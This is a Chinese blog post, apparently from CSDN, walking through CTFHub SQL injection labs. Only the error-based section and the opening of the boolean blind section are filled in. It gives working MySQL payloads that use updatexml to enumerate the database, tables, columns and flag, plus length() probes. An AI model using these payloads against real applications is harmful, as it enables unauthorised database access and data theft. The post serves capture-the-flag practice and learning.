CTFHub——SQL注入

本文详细介绍了多种SQL注入攻击手法,包括报错注入、布尔盲注、时间盲注等,通过实例展示了如何利用这些技巧获取数据库信息。同时,提到了针对空格过滤的绕过方法,以及使用工具如sqlmap进行自动化攻击。
摘要由CSDN通过智能技术生成

目录

报错注入

布尔盲注

时间盲注

MySQL结构

Cookie注入

UA注入

Refer注入

过滤空格


附上链接:CTFHub

报错注入

按照它的提示:输入1

尝试闭合

输入1'

发现报错

判断几列

 

查询数据库

1 union select updatexml(1,concat(0x7e,database(),0x7e),1); #

查询表名

1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema="sqli"),0x7e),1); # 

查询列名

1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1); #

查询flag信息

1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1); #

发现不全

1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1); #

布尔盲注

left( str, length) 从左开始截取字符串

 输入1

1'

判断列数

判断数据库长度

1 and length(database())>5

1 and length(database())=4

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值